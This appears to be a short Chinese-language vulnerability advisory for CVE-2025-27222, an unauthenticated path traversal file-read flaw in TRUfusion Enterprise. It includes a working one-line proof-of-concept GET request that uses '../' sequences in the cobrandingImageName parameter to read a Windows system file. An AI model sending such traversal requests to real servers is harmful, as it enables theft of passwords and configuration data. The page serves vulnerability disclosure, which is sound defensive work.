TRUfusion Enterprise /trufusionPortal/getCobrandingData 文件读取漏洞(CVE-2025-27222)

2026-03-13 TRUfusion Enterprise PoC Public

Description

该漏洞为TRUfusion Enterprise ≤ 7.10.4.0存在的路径穿越漏洞,允许未认证攻击者读取服务器任意文件,从而泄露敏感明文密码、配置文件及其他机密数据

PoC

GET /trufusionPortal/getCobrandingData?cobrandingImageName=../../../../../../Windows/System32/drivers/etc/hosts HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities